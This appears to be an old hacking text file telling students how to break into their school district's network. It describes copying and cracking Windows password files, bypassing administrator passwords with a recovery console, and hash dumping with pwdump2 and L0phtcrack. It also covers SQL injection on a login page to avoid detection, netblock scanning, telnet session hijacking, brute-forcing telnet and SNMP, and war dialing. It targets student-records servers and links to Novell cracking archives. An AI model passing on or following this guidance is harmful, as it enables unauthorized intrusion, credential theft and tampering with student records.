Section 1: Accessing the Shared Network ---------------------------------------- Computer class (if you have one) is of course a good place to start. Your computer class will undoubtedly use a windows operating system (not saying this is always the case, but usually...) so let's start from there. Usually these computers have two rights, user and administrator rights. So our first goal here is to jump from user (the privileges you currently have) to administrator privileges. If the operating system is Windows 9.x then we will look for the *.pwl file for the administrator account. This will be labeled according to the admin username. You'll find this in the windows directory. Just sneak in a floppy disk during class and copy the file to the floppy. Then take the file home and use a pwl cracker to crack the file (if you use brute force, make the settings lower case letters with 1-10 characters, but I'd suggest first trying a dictionary crack. Just collect yourself a few word lists). It'll take a while to crack the password so you will have to be patient. If the operating system is Windows XP then that just makes it even easier. Just grab a Windows 2k CD (download one off kazaa or overnet, if you don't have a copy) and sneak it into class. Place the CD in and boot up the computer. Then start the Win2k Recovery Console, which is a troubleshooting program. This will allow you to operate as administrator without even having to bother with the password. So now that you have administrator privileges go to "Network Neighborhood" and take a look through the network. Copy a few addresses (anything that seems interesting), and if the computers used are Win9.x, when you go home you can load up your internet browser and type "file://[target address]" to gain access. This is network access, but not the kind that will allow you to gain superuser access (unless the software the teachers use for accessing/modifying/deleting student records happens to be installed on the computer, and the password just conveniently happens to be the same password that the teacher uses on the windows administration account....which is not entirely far fetched). If the computer you are using is Win2k (Windows 2000) use the newest version of pwdump2 to dump the hash, and then use L0phtcrack to break it. p.s: If you don't have a computer class, then you can try the computers at the library. Section 2: Network Exploitation ------------------------------- Now let's talk network operating systems (NOSs). If your school uses Windows workgroups as a NOS, then the method described above would be your method in. Most likely, if the NOS is not windows workgroups, then it is Novell Netware. So now lets get into novell. Novell Netware is a server-based operating system for networks. Novell runs off a version of DOS called dr-dos (also known as Caldera DOS, since it was created by Caldera Systems Inc). It also runs off a protocol called IPX/SPX (Internetwork Packet eXchange/Sequencial Packet eXchange), which is very TCP/IP compatible (the later versions of novell run off a protocol based off ipx/spx known as NCP, Netware Core Protocol). Now in novell netware there are four different kind of rights given. There is user which gives access to //public and some other basic files. There is superuser, which is the access given to teachers. With this access they can view and delete student accounts whenever neccessary, but they can not delete, create, or change accounts. There is supervisor, which is the access administrators give themselves to work off of. And finally there is console, which is the highest rights one could gain on a novell network. Now since there have already been many articles written on novell network infiltration (and I'm in a lazy mood) I am now going to point you in the direction of articles that I had posted up from a previous article on a very similar subject (exactly the same subject actually, but targeted at a specific school network)... Novell Netware v1.x-4.x: http://www.geocities.com/anti_dcss/novell_faq.zip Novell Netware v3.12-4.x: http://www.geocities.com/anti_dcss/novzero.zip Novell Netware v5.x: http://www.geocities.com/anti_dcss/hack_novell.zip There is also AppleTalk, which may be implemented in order to integrate the Macintosh computers with the rest of the network, but it isn't really necessary to exploit AppleTalk so I won't get into it. Now lets get into exploiting the network from a remote location, which I'm sure is what most of you want to do. Lets start off with the school's website (if your school happens to have one). The best way to find out which server the school is using is by telneting into port 80, but instead of writing the address as it is, change the last character of the address from .html or .htm to something like .htmx, thereby causing the server to bring up an error which will contain the type and version of the server that is hosting the school's website. If the server you happen to find is an IIS server, then you can likely find a login.asp page on the site. If you do so, then you can perform an sql injection on the login.asp page, to gain access into the internal network without raising any eyebrows from security (it will only log up as an error 500 I believe, though my memory is a bit vague). If this is not an option then you can perform a netscan (scan from xxx.xxx.xxx.1 - xxx.xxx.xxx.254) on the netblock, based on the ip address that is hosting the web site, in order to find other servers (ftp, remote administration, etc.) that you can use to crawl into the internal network. For example, the router will usually be addressed on *.1. If you do a quick port scan on the router, then you will find either/or a telnet server (23) or snmp (161). If telnet is open then you can exploit the fact that all telnet sessions are unencrypted by using a tool like either Juggernaut, Hunt, or IP Watcher to hijack a session to passively sniff out sensitive information (like passwords of course). Of course you can also skip all that and just try and crack the telnet prompt with tools like brutus. SNMP is protected by community strings, but in many cases these are set as default, which is "private". If not you can use a community string brute force program (for example SolarWinds) to break into the router. There are other servers of course that you will find on the netrange that I will not get into, because it will be up to you to do the research necessary (find out which servers are running and which versions they are, what they are vulnerable to, etc). Sometimes you can also do it the old school way and perform an exchange scan on the school using a war dialer (like you can see on the movie Wargames) to perhaps find an open modem that you can break through to send you right into the internal network (you may think such methods are outdated, but you would be surprised). You can set the area for this scan based on one of the public phone numbers for the school district itself. Not the school you are attending, but the school district. Since as you may have noticed from this article, the internal network is for the school district, which are separated into separate networks that are routed together. I'm sure school districts are also jumping into wireless technology, and it's a possibility (depending on school funding and the district's awareness) that your school has also implemented such technologies into their internal network in order to provide convenience and efficiency for the staff of the school district. For an introduction to wireless technologies and how one can exploit such implementations then I would highly suggest reading my System Cracking 2k article (which you can find with a quick google search). Note: If the teachers at your school use a program called TSIS to manage student records, then usually there will also be a TSIS remote login server on the network. Using a scanner you should be able to pick up on this. The address is usually... http://tsis.(county name).k12.(state initials).us If you happen to find one of these, then you can probably use a technique like passive packet sniffing or http cracking to gain access into the internal network.